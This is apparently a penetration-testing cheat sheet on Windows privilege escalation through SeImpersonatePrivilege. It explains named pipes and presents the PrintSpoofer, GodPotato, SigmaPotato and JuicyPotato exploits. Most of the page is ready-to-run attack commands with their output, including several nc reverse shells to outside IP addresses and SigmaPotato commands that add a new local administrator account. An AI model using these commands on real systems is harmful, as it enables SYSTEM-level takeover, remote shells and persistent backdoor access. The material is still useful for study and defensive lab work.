SeImpersonatePrivilege

The SeImpersonatePrivilege allows a user to operate under another user's security context, typically by impersonating clients via mechanisms like named pipes or RPC.

Named pipes are a method of inter-process communication (IPC) in Windows. They let two separate processes—either on the same system or across a network—send and receive data as if they were reading/writing to a file. Think of a named pipe as a virtual file that one process (the server) creates and waits on, while another (the client) connects to it using a known name (like \\.\pipe\mypipe). Once connected, both processes can exchange data in real time.

The SeImpersonate privilege is normally assigned to Administrator accounts and built-in service accounts like LOCAL SERVICE, NETWORK SERVICE, and SERVICE. While rare for standard users, it is often accessible when gaining code execution through services like IIS, which commonly run under accounts that have it. In the context of privilege escalation, named pipes can be abused when a privileged process connects to a pipe controlled by a lower-privileged attacker. If the attacker has SeImpersonatePrivilege, they can impersonate the connecting user, effectively hijacking their permissions.

PoCs

1. OS Build

Check the OS build and map its version:

>ver
Microsoft Windows [Version 10.0.18362.719]

>systeminfo
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18362 N/A Build 18362

2. Spooler

For versions between 1809 - 1909 check if the Spooler service is runing:

# Check if Spooler is running
>sc query Spooler

SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 1  STOPPED

> Get-Service -Name Spooler

Status   Name               DisplayName
------   ----               -----------
Stopped  Spooler            Print Spooler

3. PoC

Check the table below:

Exploit	Target Mechanism	Typical Use Case / Notes	OS Compatibility
JuicyPotato	COM objects implementing IMarshal	Flexible; works with many COM objects. Use -z to test CLSID first.	Most Windows versions (Server 2008 SP1 and up, including 10/11)
PrintSpoofer	RPC / Named Pipes (Print Spooler API)	Fast and reliable; requires Print Spooler service to be running.	Windows 10 / 2016–2019 (some patched)
GodPotato	COM Server Hijack	Use when PrintSpoofer is patched; requires specific COM object.	Newer Windows (10/11)
SigmaPotato	Event Log Service / Spooler / WMI	Fallback when PrintSpoofer and GodPotato fail; depends on legacy service configuration.	Windows 10+ (better on newer builds)

PrintSpofer

PrintSpoofer is a local privilege escalation exploit that abuses the SeImpersonatePrivilege to impersonate the SYSTEM account via a named pipe trick. It can be leveraged to sent a reverse shell or execute commands directly:

# Reverse shell
PrintSpoofer.exe -c "nc.exe 10.10.13.37 1337 -e cmd"

# Command execution
PrintSpoofer.exe -i -c cmd

It can also be used to spawn a SYSTEM shell on the desktop, for instance, when logged in via an RDP session:

# Check your session ID
C:\TOOLS>qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>rdp-tcp           lab-user                  3  Active
 
# Spawn a new shell
C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"

GodPotato

GodPotato is a local privilege escalation exploit that abuses COM and SeImpersonatePrivilege to impersonate SYSTEM by hijacking privileged tokens via named pipes.

# Reverse shell
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

# Command execution
GodPotato -cmd "cmd /c whoami"

SigmaPotato

SigmaPotato is a local privilege escalation exploit that leverages the SeImpersonatePrivilege and the Event Log service to hijack a SYSTEM token through named pipe impersonation.

# Reverse shell
./SigmaPotato.exe --revshell <ip_addr> <port>

# Command execution
./SigmaPotato.exe <command>

It can be also used to create a new local administrator:

> .\sigmapotato.exe "net user dave4 Pass123! /add"
[+] Process Output:
The command completed successfully.


> .\sigmapotato.exe "net localgroup Administrators dave4 /add"
[+] Process Output:
The command completed successfully.

> Get-LocalGroupMember administrators
User        CLIENTWK220\dave4         Local

JuicyPotato

JuicyPotato is a Windows privilege escalation tool that elevates service account privileges to NT AUTHORITY\SYSTEM by exploiting COM objects with SeImpersonatePrivilege. It instantiates vulnerable COM classes, triggers local NTLM authentication, and executes arbitrary commands with SYSTEM-level access. The tool allows specifying CLSID, port, and target executable, making it effective when traditional escalation methods are blocked or systems are hardened. Various CLSID lists can be found here.

> Juicy.Potato.x86.exe -p c:\windows\system32\cmd.exe -t * -a "/c C:\wamp\www\nc.exe 192.168.45.241 80 -e cmd.exe" -l 80 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 80
....
[+] authresult 0
{3c6859ce-230b-48a4-be6c-932c0c202048};NT AUTHORITY\SYSTEM
​
[+] CreateProcessWithTokenW OK

RoguePotato

WIP (RoguePotato)